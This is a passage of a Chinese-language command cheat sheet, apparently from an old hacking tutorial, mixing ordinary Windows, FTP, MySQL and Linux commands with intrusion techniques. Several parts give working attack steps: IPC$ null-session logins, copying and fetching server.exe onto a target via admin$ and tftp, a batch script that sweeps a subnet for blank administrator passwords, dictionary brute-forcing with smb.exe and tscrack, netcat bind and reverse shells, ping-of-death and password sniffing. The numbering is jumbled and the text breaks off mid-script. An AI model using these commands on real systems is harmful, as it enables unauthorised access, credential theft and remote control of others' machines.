<p>　　61. dcomcnfg——-打开系统组件服务</p>
<p>　　62. ddeshare——-打开DDE共享设置</p>
<p>　　110. osk————打开屏幕键盘</p>
<p>　　111. odbcad32——-ODBC数据源管理器</p>
<p>　　112. oobe/msoobe /a—-检查XP是否激活</p>
<p>　　68. ntbackup——-系统备份和还原</p>
<p>　　69. narrator——-屏幕“讲述人”</p>
<p>　　70. ntmsmgr.msc—-移动存储管理器</p>
<p>　　71. ntmsoprq.msc—移动存储管理员操作请求</p>
<p>　　72. netstat -an—-(TC)命令检查接口</p>
<p>　　73. syncapp——–创建一个公文包</p>
<p>　　74. sysedit——–系统配置编辑器</p>
<p>　　75. sigverif——-文件签名验证程序</p>
<p>　　76. ciadv.msc——索引服务程序</p>
<p>　　77. shrpubw——–创建共享文件夹</p>
<p>　　78. secpol.msc—–本地安全策略</p>
<p>　　79. syskey———系统加密，一旦加密就不能解开，保护windows xp系统的双重密码</p>
<p>　　80. services.msc—本地服务设置</p>
<p>　　81. Sndvol32——-音量控制程序</p>
<p>　　82. sfc.exe——–系统文件检查器</p>
<p>　　83. sfc /scannow—windows文件保护</p>
<p>　　84. ciadv.msc——索引服务程序</p>
<p>　　85. tourstart——xp简介（安装完成后出现的漫游xp程序）</p>
<p>　　86. taskmgr——–任务管理器</p>
<p>　　87. eventvwr——-事件查看器</p>
<p>　　88. eudcedit——-造字程序</p>
<p>　　89. compmgmt.msc—计算机管理</p>
<p>　　90. packager——-对象包装程序</p>
<p>　　91. perfmon.msc—-计算机性能监测程序</p>
<p>　　92. charmap——–启动字符映射表</p>
<p>　　93. cliconfg——-SQL SERVER 客户端网络实用程序</p>
<p>　　94. Clipbrd——–剪贴板查看器</p>
<p>　　95. conf———–启动netmeeting</p>
<p>　　96. certmgr.msc—-证书管理实用程序</p>
<p>　　97. regsvr32 /u *.dll—-停止dll文件运行</p>
<p>　　98. regsvr32 /u zipfldr.dll——取消ZIP支持</p>
<p>　　99. cmd.exe——–CMD命令提示符</p>
<p>操作详解　　</p>
<p>net use ipipc$ “ “ /user:” “ 建立IPC空链接</p>
<p>　　net use ipipc$ “密码” /user:”用户名” 建立IPC非空链接</p>
<p>　　net use h: ipc$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H:</p>
<p>　　net use h: ipc$ 登陆后映射对方C：到本地为H:</p>
<p>　　net use ipipc$ /del 删除IPC链接</p>
<p>　　net use h: /del 删除映射对方到本地的为H:的映射</p>
<p>　　net user 用户名　密码　/add 建立用户</p>
<p>　　net user guest /active:yes 激活guest用户</p>
<p>　　net user 查看有哪些用户</p>
<p>　　net user 帐户名 查看帐户的属性</p>
<p>　　net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限</p>
<p>　　net start 查看开启了哪些服务</p>
<p>　　net start 服务名　开启服务；(如:net start telnet， net start schedule)</p>
<p>　　net stop 服务名 停止某服务</p>
<p>　　net time 目标ip 查看对方时间</p>
<p>　　net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息</p>
<p>　　net view 查看本地局域网内开启了哪些共享</p>
<p>　　net view ip 查看对方局域网内开启了哪些共享</p>
<p>　　net config 显示系统网络设置</p>
<p>　　net logoff 断开连接的共享</p>
<p>　　net pause 服务名 暂停某服务</p>
<p>　　net send ip “文本信息” 向对方发信息</p>
<p>　　net ver 局域网内正在使用的网络连接类型和信息</p>
<p>　　net share 查看本地开启的共享</p>
<p>　　net share ipc$ 开启ipc$共享</p>
<p>　　net share ipc$ /del 删除ipc$共享</p>
<p>　　net share c$ /del 删除C：共享</p>
<p>　　net user guest 12345 用guest用户登陆后用将密码改为12345</p>
<p>　　net password 密码 更改系统登陆密码</p>
<p>　　netstat -a 查看开启了哪些端口,常用netstat -an</p>
<p>　　netstat -n 查看端口的网络连接情况，常用netstat -an</p>
<p>　　netstat -v 查看正在进行的工作</p>
<p>　　netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况</p>
<p>　　netstat -s 查看正在使用的所有协议使用情况</p>
<p>　　nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名</p>
<p>　　tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。</p>
<p>　　ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。</p>
<p>　　ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)</p>
<p>　　ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息</p>
<p>　　tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)</p>
<p>　　kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)</p>
<p>　　del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR <em>.</em>”表示删除当前目录下所有只读文件，“DEL/A-S <em>.</em>”表示删除当前目录下除系统文件以外的所有文件</p>
<p>　　del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）</p>
<p>　　move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖</p>
<p>　　fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，”&gt; “和”&gt; &gt;” 是重定向命令</p>
<p>　　at id号 开启已注册的某个计划任务</p>
<p>　　at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止</p>
<p>　　at id号 /delete 停止某个已注册的计划任务</p>
<p>　　at 查看所有的计划任务</p>
<p>　　at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机</p>
<p>　　finger username @host 查看最近有哪些用户登陆</p>
<p>　　telnet ip 端口 远和登陆服务器,默认端口为23</p>
<p>　　open ip 连接到IP（属telnet登陆后的命令）</p>
<p>　　telnet 在本机上直接键入telnet 将进入本机的telnet</p>
<p>　　copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件</p>
<p>　　copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下</p>
<p>　　copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件</p>
<p>　　copy ipadmin$svv.exe c: 或:copyipadmin$<em>.</em> 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：</p>
<p>　　xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件</p>
<p>　　用参数/e才可连目录下的子目录一起复制到目标地址下。</p>
<p>　　tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将“IP”的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送</p>
<p>　　tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机</p>
<p>　　ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)</p>
<p>　　route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface</p>
<p>　　arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息</p>
<p>　　start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令</p>
<p>　　mem 查看cpu使用情况</p>
<p>　　attrib 文件名(目录名) 查看某文件（目录）的属性</p>
<p>　　attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用+则是添加为某属性</p>
<p>　　dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间</p>
<p>　　date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间</p>
<p>　　set 指定环境变量名称=要指派给变量的字符 设置环境变量</p>
<p>　　set 显示当前所有的环境变量</p>
<p>　　set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量</p>
<p>　　pause 暂停批处理程序，并显示出：请按任意键继续….</p>
<p>　　if 在批处理程序中执行条件处理（更多说明见if命令及变量）</p>
<p>　　goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）</p>
<p>　　call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）</p>
<p>　　for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）</p>
<p>　　echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置</p>
<p>　　echo 信息 在屏幕上显示出信息</p>
<p>　　echo 信息 &gt;&gt; pass.txt 将”信息”保存到pass.txt文件中</p>
<p>　　findstr “Hello” aa.txt 在aa.txt文件中寻找字符串hello</p>
<p>　　find 文件名 查找某文件</p>
<p>　　title 标题名字 更改CMD窗口标题名字</p>
<p>　　color 颜色值 设置cmd控制台前景和背景颜色；0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白</p>
<p>　　prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )</p>
<p>　　ver 在DOS窗口下显示版本信息</p>
<p>　　winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</p>
<p>　　format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS</p>
<p>　　md　目录名 创建目录</p>
<p>　　replace 源文件　要替换文件的目录 替换文件</p>
<p>　　ren 原文件名　新文件名 重命名文件名</p>
<p>　　tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称</p>
<p>　　type 文件名 显示文本文件的内容</p>
<p>　　more 文件名 逐屏显示输出文件</p>
<p>　　doskey 要锁定的命令=字符</p>
<p>　　doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=</p>
<p>　　taskmgr 调出任务管理器</p>
<p>　　chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误</p>
<p>　　tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口</p>
<p>　　exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe</p>
<p>　　path 路径可执行文件的文件名 为可执行文件设置一个路径。</p>
<p>　　cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?</p>
<p>　　regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；</p>
<p>　　regedit /e 注册表文件名 导出注册表</p>
<p>　　cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。</p>
<p>　　cacls 文件名 查看文件的访问用户权限列表</p>
<p>　　REM 文本内容 在批处理文件中添加注解</p>
<p>　　netsh 查看或更改本地网络配置情况</p>
<p>　　IIS服务命令</p>
<p>　　iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）</p>
<p>　　iisreset /start或stop 启动（停止）所有Internet服务</p>
<p>　　iisreset /restart 停止然后重新启动所有Internet服务</p>
<p>　　iisreset /status 显示所有Internet服务状态</p>
<p>　　iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动</p>
<p>　　iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机</p>
<p>　　iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务</p>
<p>　　iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。</p>
<p>　　FTP 命令： (后面有详细说明内容)</p>
<p>　　ftp的命令行格式为:</p>
<p>　　ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。</p>
<p>　　－d 使用调试方式。</p>
<p>　　－n 限制ftp的自动登录,即不使用.netrc文件。</p>
<p>　　－g 取消全局文件名。</p>
<p>　　help [命令] 或 ？[命令] 查看命令说明</p>
<p>　　bye 或 quit 终止主机FTP进程,并退出FTP管理方式.</p>
<p>　　pwd 列出当前远端主机目录</p>
<p>　　put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中</p>
<p>　　get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中</p>
<p>　　mget [remote-files] 从远端主机接收一批文件至本地主机</p>
<p>　　mput local-files 将本地主机中一批文件传送至远端主机</p>
<p>　　dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件</p>
<p>　　ascii 设定以ASCII方式传送文件(缺省值)</p>
<p>　　bin 或 image 设定以二进制方式传送文件</p>
<p>　　bell 每完成一次文件传送,报警提示</p>
<p>　　cdup 返回上一级目录</p>
<p>　　close 中断与远程服务器的ftp会话(与open对应)</p>
<p>　　open host[port] 建立指定ftp服务器连接,可指定连接端口</p>
<p>　　delete 删除远端主机中的文件</p>
<p>　　mdelete [remote-files] 删除一批文件</p>
<p>　　mkdir directory-name 在远端主机中建立目录</p>
<p>　　rename [from] [to] 改变远端主机中的文件名</p>
<p>　　rmdir directory-name 删除远端主机中的目录</p>
<p>　　status 显示当前FTP的状态</p>
<p>　　system 显示远端主机系统类型</p>
<p>　　user user-name [password] [account] 重新以别的用户名登录远端主机</p>
<p>　　open host [port] 重新建立一个新的连接</p>
<p>　　prompt 交互提示模式</p>
<p>　　macdef 定义宏命令</p>
<p>　　lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录</p>
<p>　　chmod 改变远端主机的文件权限</p>
<p>　　case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母</p>
<p>　　cd remote－dir 进入远程主机目录</p>
<p>　　cdup 进入远程主机目录的父目录</p>
<p>　　! 在本地机中执行交互shell，exit回到ftp环境,如!ls*.zip</p>
<p>　　#5</p>
<p>　　MYSQL 命令</p>
<p>　　mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。</p>
<p>　　（例：mysql -h110.110.110.110 -Uroot -P123456</p>
<p>　　注:u与root可以不用加空格，其它也一样）</p>
<p>　　exit 退出MYSQL</p>
<p>　　mysqladmin -u用户名 -p旧密码 password 新密码 修改密码</p>
<p>　　grant select on 数据库.* to 用户名@登录主机 identified by “密码”; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）</p>
<p>　　show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。</p>
<p>　　use mysql；</p>
<p>　　show tables; 显示库中的数据表</p>
<p>　　describe 表名; 显示数据表的结构</p>
<p>　　create database 库名; 建库</p>
<p>　　use 库名；</p>
<p>　　create table 表名 (字段设定列表)； 建表</p>
<p>　　drop database 库名;</p>
<p>　　drop table 表名； 删库和删表</p>
<p>　　delete from 表名; 将表中记录清空</p>
<p>　　select * from 表名; 显示表中的记录</p>
<p>　　mysqldump –opt school&gt;school.bbb 备份数据库：（命令在DOS的mysqlin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。</p>
<p>　　win2003系统下新增命令（实用部份）：</p>
<p>　　shutdown /参数 关闭或重启本地或远程主机。</p>
<p>　　参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。</p>
<p>　　例：shutdown /r /t 0 立即重启本地主机（无延时）</p>
<p>　　taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。</p>
<p>　　参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。</p>
<p>　　tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。</p>
<p>　　参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。</p>
<p>　　Linux系统下基本命令　注：要区分大小写</p>
<p>　　uname 显示版本信息（同win2K的 ver）</p>
<p>　　dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）</p>
<p>　　pwd 查询当前所在的目录位置</p>
<p>　　cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。</p>
<p>　　cat 文件名 查看文件内容</p>
<p>　　cat &gt;abc.txt 往abc.txt文件中写上内容。</p>
<p>　　more 文件名 以一页一页的方式显示一个文本文件。</p>
<p>　　cp 复制文件</p>
<p>　　mv 移动文件</p>
<p>　　rm 文件名 删除文件，rm -a 目录名删除目录及子目录</p>
<p>　　mkdir 目录名 建立目录</p>
<p>　　rmdir 删除子目录，目录内没有文档。</p>
<p>　　chmod 设定档案或目录的存取权限</p>
<p>　　grep 在档案中查找字符串</p>
<p>　　diff 档案文件比较</p>
<p>　　find 档案搜寻</p>
<p>　　date 现在的日期、时间</p>
<p>　　who 查询目前和你使用同一台机器的人以及Login时间地点</p>
<p>　　w 查询目前上机者的详细资料</p>
<p>　　whoami 查看自己的帐号名称</p>
<p>　　groups 查看某人的Group</p>
<p>　　passwd 更改密码</p>
<p>　　history 查看自己下过的命令</p>
<p>　　ps 显示进程状态</p>
<p>　　kill 停止某进程</p>
<p>　　gcc 黑客通常用它来编译C语言写的文件</p>
<p>　　su 权限转换为指定使用者</p>
<p>　　telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。</p>
<p>　　ftp ftp连接上某服务器（同win2K）</p>
<p>　　批处理命令与变量</p>
<p>　　1：for命令及变量 基本格式</p>
<p>　　FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。</p>
<p>　　批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3</p>
<p>　　(set):指定一个或一组文件，可使用通配符，如：(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个”1”指起始值，第二个”1”指增长量，第三个”254”指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }</p>
<p>　　command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：&amp; 来隔开</p>
<p>　　command_parameters：为特定命令指定参数或命令行开关</p>
<p>　　IN (set)：指在(set)中取值；DO command ：指执行command</p>
<p>　　参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到取完为止{ (set)为文件时，如(d:pass.txt)时 }。</p>
<p>　　用法举例：</p>
<p>　　@echo off</p>
<p>　　echo 用法格式：test.bat <em>.</em>.* &gt; test.txt</p>
<p>　　for /L %%G in (1 1 254) do echo %1.%%G &gt;&gt;test.txt &amp; net use %1.%%G /user:administrator | find “命令成功完成” &gt;&gt;test.txt</p>
<p>　　存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。</p>
<p>　　/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：<em>.</em>.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；&amp; 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有”命令成功完成”信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。</p>
<p>　　@echo off</p>
<p>　　echo 用法格式：ok.bat ip</p>
<p>　　FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200</p>
<p>　　存为：ok.exe 说明：输入一个IP后，用字典文件d:pass.dic来暴解d:user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。</p>
<p>　　七：</p>
<p>　　2：if命令及变量 基本格式</p>
<p>　　IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。</p>
<p>　　例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。</p>
<p>　　0 指发现并成功执行（真）；1 指没有发现、没执行（假）。</p>
<p>　　IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。</p>
<p>　　例：“if “%2%”==”4” goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加” “）</p>
<p>　　IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。</p>
<p>　　例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到”:end”标签处。</p>
<p>　　IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用&lt; &gt;括起来，因为del命令要单独一行时才能执行，用上&lt; &gt;后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”</del></p>
<p>　　系统外部命令</p>
<p>　　注：系统外部命令(均需下载相关工具)</p>
<p>　　瑞士军刀：nc.exe</p>
<p>　　参数说明：</p>
<p>　　-h 查看帮助信息</p>
<p>　　-d 后台模式</p>
<p>　　-e prog程序重定向，一但连接就执行[危险]</p>
<p>　　-i secs延时的间隔</p>
<p>　　-l 监听模式，用于入站连接</p>
<p>　　-L 监听模式，连接天闭后仍然继续监听，直到CTR+C</p>
<p>　　-n IP地址，不能用域名</p>
<p>　　-o film记录16进制的传输</p>
<p>　　-p[空格]端口 本地端口号</p>
<p>　　-r 随机本地及远程端口</p>
<p>　　-t 使用Telnet交互方式</p>
<p>　　-u UDP模式</p>
<p>　　-v 详细输出，用-vv将更详细</p>
<p>　　-w数字 timeout延时间隔</p>
<p>　　-z 将输入，输出关掉（用于扫锚时）</p>
<p>　　基本用法：</p>
<p>　　nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口</p>
<p>　　nc -l -p 80 开启本机的TCP 80端口并监听</p>
<p>　　nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口</p>
<p>　　nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口</p>
<p>　　nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口</p>
<p>　　高级用法：</p>
<p>　　nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止</p>
<p>　　nc -L -p 80 &gt; c:log.txt 作为蜜罐用2：开启并不停地监听80端口，直到CTR+C,同时把结果输出到c:log.txt</p>
<p>　　nc -L -p 80 &lt; c:honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中，亦可起到传送文件作用</p>
<p>　　type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端口，直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用</p>
<p>　　本机上用：nc -l -p 本机端口</p>
<p>　　在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K</p>
<p>　　nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙</p>
<p>　　本机上用：nc -d -l -p 本机端口 &lt; 要传送的文件路径及名称</p>
<p>　　在对方主机上用：nc -vv 本机IP 本机端口 &gt; 存放文件的路径及名称 传送文件到对方主机</p>
<p>　　备 注：</p>
<p>　　| 管道命令</p>
<p>　　&lt; 或 &gt; 重定向命令。“&lt;”，例如：tlntadmn &lt; test.txt 指把test.txt的内容赋值给tlntadmn命令</p>
<p>　　@ 表示执行@后面的命令，但不会显示出来（后台执行）；例：@dir c:winnt &gt;&gt; d:log.txt 意思是：后台执行dir，并把结果存在d:log.txt中</p>
<p>　　&gt;与&gt;&gt;的区别 “&gt;”指：覆盖；”&gt;&gt;”指：保存到(添加到）。</p>
<p>　　如：@dir c:winnt &gt;&gt; d:log.txt和@dir c:winnt &gt; d:log.txt二个命令分别执行二次比较看：用&gt;&gt;的则是把二次的结果都保存了，而用：&gt;则只有一次的结果，是因为第二次的结果把第一次的覆盖了。</p>
<p>　　八：</p>
<p>　　扫描工具：xscan.exe</p>
<p>　　基本格式</p>
<p>　　xscan -host &lt;起始IP&gt;[-&lt;终止IP&gt;] &lt;检测项目&gt; [其他选项] 扫锚”起始IP到终止IP”段的所有主机信息</p>
<p>　　xscan -file &lt;主机列表文件名&gt; &lt;检测项目&gt; [其他选项] 扫锚”主机IP列表文件名”中的所有主机信息</p>
<p>　　检测项目</p>
<p>　　-active 检测主机是否存活</p>
<p>　　-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）</p>
<p>　　-port 检测常用服务的端口状态</p>
<p>　　-ftp 检测FTP弱口令</p>
<p>　　-pub 检测FTP服务匿名用户写权限</p>
<p>　　-pop3 检测POP3-Server弱口令</p>
<p>　　-smtp 检测SMTP-Server漏洞</p>
<p>　　-sql 检测SQL-Server弱口令</p>
<p>　　-smb 检测NT-Server弱口令</p>
<p>　　-iis 检测IIS编码/解码漏洞</p>
<p>　　-cgi 检测CGI漏洞</p>
<p>　　-nasl 加载Nessus攻击脚本</p>
<p>　　-all 检测以上所有项目</p>
<p>　　其它选项</p>
<p>　　-i 适配器编号 设置网络适配器, &lt;适配器编号&gt;可通过”-l”参数获取</p>
<p>　　-l 显示所有网络适配器</p>
<p>　　-v 显示详细扫描进度</p>
<p>　　-p 跳过没有响应的主机</p>
<p>　　-o 跳过没有检测到开放端口的主机</p>
<p>　　-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10</p>
<p>　　-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件)</p>
<p>　　用法示例</p>
<p>　　xscan -host 192.168.1.1-192.168.255.255 -all -active -p　检测192.168.1.1-192.168.255.255网段内主机的所有漏洞，跳过无响应的主机</p>
<p>　　xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态，NT弱口令用户，最大并发线程数量为150，跳过没有检测到开放端口的主机</p>
<p>　　xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态，CGI漏洞，最大并发线程数量为200，同一时刻最多检测5台主机，显示详细检测进度，跳过没有检测到开放端口的主机</p>
<p>　　九：</p>
<p>　　命令行方式嗅探器: xsniff.exe</p>
<p>　　可捕获局域网内FTP/SMTP/POP3/HTTP协议密码</p>
<p>　　参数说明</p>
<p>　　-tcp 输出TCP数据报</p>
<p>　　-udp 输出UDP数据报</p>
<p>　　-icmp 输出ICMP数据报</p>
<p>　　-pass 过滤密码信息</p>
<p>　　-hide 后台运行</p>
<p>　　-host 解析主机名</p>
<p>　　-addr IP地址 过滤IP地址</p>
<p>　　-port 端口 过滤端口</p>
<p>　　-log 文件名 将输出保存到文件</p>
<p>　　-asc 以ASCII形式输出</p>
<p>　　-hex 以16进制形式输出</p>
<p>　　用法示例</p>
<p>　　xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中</p>
<p>　　xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出</p>
<p>　　终端服务密码破解: tscrack.exe</p>
<p>　　参数说明</p>
<p>　　-h 显示使用帮助</p>
<p>　　-v 显示版本信息</p>
<p>　　-s 在屏幕上打出解密能力</p>
<p>　　-b 密码错误时发出的声音</p>
<p>　　-t 同是发出多个连接（多线程）</p>
<p>　　-N Prevent System Log entries on targeted server</p>
<p>　　-U 卸载移除tscrack组件</p>
<p>　　-f 使用－f后面的密码</p>
<p>　　-F 间隔时间（频率）</p>
<p>　　-l 使用－l后面的用户名</p>
<p>　　-w 使用－w后面的密码字典</p>
<p>　　-p 使用－p后面的密码</p>
<p>　　-D 登录主页面</p>
<p>　　用法示例</p>
<p>　　tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码</p>
<p>　　tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户</p>
<p>　　@if not exist ipcscan.txt goto noscan</p>
